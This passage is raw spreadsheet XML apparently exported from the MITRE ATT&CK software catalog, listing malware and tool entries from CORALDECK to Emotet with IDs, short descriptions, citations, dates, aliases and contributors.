    <t>Backdoor.SofacyX, SPLM, X-Agent, Xagent, webhp</t>
  </si>
  <si>
    <t>Richard Gold, Digital Shadows</t>
  </si>
  <si>
    <t>S0212</t>
  </si>
  <si>
    <t>CORALDECK</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0212</t>
  </si>
  <si>
    <t>S0137</t>
  </si>
  <si>
    <t>CORESHELL</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0137</t>
  </si>
  <si>
    <t>SOURFACE, Sofacy</t>
  </si>
  <si>
    <t>S0527</t>
  </si>
  <si>
    <t>CSPY Downloader</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0527</t>
  </si>
  <si>
    <t>09 November 2020</t>
  </si>
  <si>
    <t>22 April 2021</t>
  </si>
  <si>
    <t>S0119</t>
  </si>
  <si>
    <t>Cachedump</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0119</t>
  </si>
  <si>
    <t>S0454</t>
  </si>
  <si>
    <t>Cadelspy</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0454</t>
  </si>
  <si>
    <t>22 May 2020</t>
  </si>
  <si>
    <t>29 May 2020</t>
  </si>
  <si>
    <t>S0274</t>
  </si>
  <si>
    <t>Calisto</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0274</t>
  </si>
  <si>
    <t>Cody Thomas, SpecterOps</t>
  </si>
  <si>
    <t>S0077</t>
  </si>
  <si>
    <t>CallMe</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0077</t>
  </si>
  <si>
    <t>S0351</t>
  </si>
  <si>
    <t>Cannon</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0351</t>
  </si>
  <si>
    <t>S0030</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0030</t>
  </si>
  <si>
    <t>01 April 2021</t>
  </si>
  <si>
    <t>Anunak</t>
  </si>
  <si>
    <t>S0484</t>
  </si>
  <si>
    <t>Carberp</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor.(Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0484</t>
  </si>
  <si>
    <t>15 July 2020</t>
  </si>
  <si>
    <t>S0335</t>
  </si>
  <si>
    <t>Carbon</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0335</t>
  </si>
  <si>
    <t>25 April 2021</t>
  </si>
  <si>
    <t>S0348</t>
  </si>
  <si>
    <t>Cardinal RAT</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0348</t>
  </si>
  <si>
    <t>S0261</t>
  </si>
  <si>
    <t>Catchamas</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0261</t>
  </si>
  <si>
    <t>S0572</t>
  </si>
  <si>
    <t>Caterpillar WebShell</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0572</t>
  </si>
  <si>
    <t>10 February 2021</t>
  </si>
  <si>
    <t>S0144</t>
  </si>
  <si>
    <t>ChChes</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0144</t>
  </si>
  <si>
    <t>HAYMAKER, Scorpion</t>
  </si>
  <si>
    <t>S0220</t>
  </si>
  <si>
    <t>Chaos</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0220</t>
  </si>
  <si>
    <t>S0107</t>
  </si>
  <si>
    <t>Cherry Picker</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0107</t>
  </si>
  <si>
    <t>S0020</t>
  </si>
  <si>
    <t>China Chopper</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0020</t>
  </si>
  <si>
    <t>23 April 2021</t>
  </si>
  <si>
    <t>2.2</t>
  </si>
  <si>
    <t>S0054</t>
  </si>
  <si>
    <t>CloudDuke</t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0054</t>
  </si>
  <si>
    <t>CloudLook, MiniDionis</t>
  </si>
  <si>
    <t>S0154</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&amp;CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)
In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0154</t>
  </si>
  <si>
    <t>14 December 2017</t>
  </si>
  <si>
    <t>24 April 2021</t>
  </si>
  <si>
    <t>1.6</t>
  </si>
  <si>
    <t>Josh Abraham; Martin Sohn Christensen, Improsec</t>
  </si>
  <si>
    <t>S0338</t>
  </si>
  <si>
    <t>Cobian RAT</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0338</t>
  </si>
  <si>
    <t>S0369</t>
  </si>
  <si>
    <t>CoinTicker</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0369</t>
  </si>
  <si>
    <t>23 April 2019</t>
  </si>
  <si>
    <t>Richie Cyrus, SpecterOps</t>
  </si>
  <si>
    <t>S0126</t>
  </si>
  <si>
    <t>ComRAT</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0126</t>
  </si>
  <si>
    <t>23 December 2020</t>
  </si>
  <si>
    <t>Matthieu Faou, ESET</t>
  </si>
  <si>
    <t>S0244</t>
  </si>
  <si>
    <t>Comnie</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0244</t>
  </si>
  <si>
    <t>S0591</t>
  </si>
  <si>
    <t>ConnectWise</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0591</t>
  </si>
  <si>
    <t>18 March 2021</t>
  </si>
  <si>
    <t>ScreenConnect</t>
  </si>
  <si>
    <t>S0575</t>
  </si>
  <si>
    <t>Conti</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0575</t>
  </si>
  <si>
    <t>17 February 2021</t>
  </si>
  <si>
    <t>S0492</t>
  </si>
  <si>
    <t>CookieMiner</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0492</t>
  </si>
  <si>
    <t>22 July 2020</t>
  </si>
  <si>
    <t>22 October 2020</t>
  </si>
  <si>
    <t>S0050</t>
  </si>
  <si>
    <t>CosmicDuke</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0050</t>
  </si>
  <si>
    <t>28 March 2020</t>
  </si>
  <si>
    <t>BotgenStudios, NemesisGemina, TinyBaron</t>
  </si>
  <si>
    <t>S0046</t>
  </si>
  <si>
    <t>CozyCar</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0046</t>
  </si>
  <si>
    <t>Cozer, CozyBear, CozyDuke, EuroAPT</t>
  </si>
  <si>
    <t>S0488</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0488</t>
  </si>
  <si>
    <t>17 July 2020</t>
  </si>
  <si>
    <t>29 July 2020</t>
  </si>
  <si>
    <t>S0115</t>
  </si>
  <si>
    <t>Crimson</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims. (Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0115</t>
  </si>
  <si>
    <t>MSIL/Crimson</t>
  </si>
  <si>
    <t>S0235</t>
  </si>
  <si>
    <t>CrossRAT</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0235</t>
  </si>
  <si>
    <t>S0538</t>
  </si>
  <si>
    <t>Crutch</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0538</t>
  </si>
  <si>
    <t>04 December 2020</t>
  </si>
  <si>
    <t>22 December 2020</t>
  </si>
  <si>
    <t>S0498</t>
  </si>
  <si>
    <t>Cryptoistic</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0498</t>
  </si>
  <si>
    <t>18 August 2020</t>
  </si>
  <si>
    <t>S0255</t>
  </si>
  <si>
    <t>DDKONG</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0255</t>
  </si>
  <si>
    <t>S0213</t>
  </si>
  <si>
    <t>DOGCALL</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0213</t>
  </si>
  <si>
    <t>S0497</t>
  </si>
  <si>
    <t>Dacls</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0497</t>
  </si>
  <si>
    <t>07 August 2020</t>
  </si>
  <si>
    <t>02 September 2020</t>
  </si>
  <si>
    <t>S0334</t>
  </si>
  <si>
    <t>DarkComet</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0334</t>
  </si>
  <si>
    <t>DarkKomet, FYNLOS, Fynloski, Krademok</t>
  </si>
  <si>
    <t>S0187</t>
  </si>
  <si>
    <t>Daserf</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0187</t>
  </si>
  <si>
    <t>16 January 2018</t>
  </si>
  <si>
    <t>Muirim, Nioupale</t>
  </si>
  <si>
    <t>S0243</t>
  </si>
  <si>
    <t>DealersChoice</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0243</t>
  </si>
  <si>
    <t>S0354</t>
  </si>
  <si>
    <t>Denis</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0354</t>
  </si>
  <si>
    <t>30 June 2020</t>
  </si>
  <si>
    <t>S0021</t>
  </si>
  <si>
    <t>Derusbi</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0021</t>
  </si>
  <si>
    <t>PHOTO</t>
  </si>
  <si>
    <t>S0200</t>
  </si>
  <si>
    <t>Dipsind</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0200</t>
  </si>
  <si>
    <t>Ryan Becwar</t>
  </si>
  <si>
    <t>S0281</t>
  </si>
  <si>
    <t>Dok</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) steals banking information through man-in-the-middle  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0281</t>
  </si>
  <si>
    <t>19 March 2020</t>
  </si>
  <si>
    <t>Retefe</t>
  </si>
  <si>
    <t>S0600</t>
  </si>
  <si>
    <t>Doki</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [Ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0600</t>
  </si>
  <si>
    <t>06 April 2021</t>
  </si>
  <si>
    <t>19 April 2021</t>
  </si>
  <si>
    <t>Containers, Linux</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID)</t>
  </si>
  <si>
    <t>S0186</t>
  </si>
  <si>
    <t>DownPaper</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0186</t>
  </si>
  <si>
    <t>S0134</t>
  </si>
  <si>
    <t>Downdelph</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0134</t>
  </si>
  <si>
    <t>Delphacy</t>
  </si>
  <si>
    <t>S0384</t>
  </si>
  <si>
    <t>Dridex</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) is a banking Trojan that has been used for financial gain. Dridex was created from the source code of the Bugat banking trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0384</t>
  </si>
  <si>
    <t>30 May 2019</t>
  </si>
  <si>
    <t>Bugat v5</t>
  </si>
  <si>
    <t>S0547</t>
  </si>
  <si>
    <t>DropBook</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0547</t>
  </si>
  <si>
    <t>S0502</t>
  </si>
  <si>
    <t>Drovorub</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0502</t>
  </si>
  <si>
    <t>25 August 2020</t>
  </si>
  <si>
    <t>18 September 2020</t>
  </si>
  <si>
    <t>S0567</t>
  </si>
  <si>
    <t>Dtrack</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0567</t>
  </si>
  <si>
    <t>25 January 2021</t>
  </si>
  <si>
    <t>S0038</t>
  </si>
  <si>
    <t>Duqu</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0038</t>
  </si>
  <si>
    <t>S0062</t>
  </si>
  <si>
    <t>DustySky</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0062</t>
  </si>
  <si>
    <t>NeD Worm</t>
  </si>
  <si>
    <t>S0024</t>
  </si>
  <si>
    <t>Dyre</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. 
 (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0024</t>
  </si>
  <si>
    <t>22 June 2020</t>
  </si>
  <si>
    <t>Dyreza, Dyzap</t>
  </si>
  <si>
    <t>Josh Campbell, Cyborg Security, @cyb0rgsecur1ty</t>
  </si>
  <si>
    <t>S0593</t>
  </si>
  <si>
    <t>ECCENTRICBANDWAGON</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a Remote Access Tool (RAT) used by [Lazarus Group](https://attack.mitre.org/groups/G0032) that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0593</t>
  </si>
  <si>
    <t>14 April 2021</t>
  </si>
  <si>
    <t>S0064</t>
  </si>
  <si>
    <t>ELMER</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0064</t>
  </si>
  <si>
    <t>S0568</t>
  </si>
  <si>
    <t>EVILNUM</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0568</t>
  </si>
  <si>
    <t>28 January 2021</t>
  </si>
  <si>
    <t>S0377</t>
  </si>
  <si>
    <t>Ebury</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0377</t>
  </si>
  <si>
    <t>19 April 2019</t>
  </si>
  <si>
    <t>Marc-Etienne M.Léveillé, ESET</t>
  </si>
  <si>
    <t>S0554</t>
  </si>
  <si>
    <t>Egregor</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0554</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>S0081</t>
  </si>
  <si>
    <t>Elise</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of
tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0081</t>
  </si>
  <si>
    <t>BKDR_ESILE, Page</t>
  </si>
  <si>
    <t>S0082</t>
  </si>
  <si>
    <t>Emissary</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0082</t>
  </si>
  <si>
    <t>S0367</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
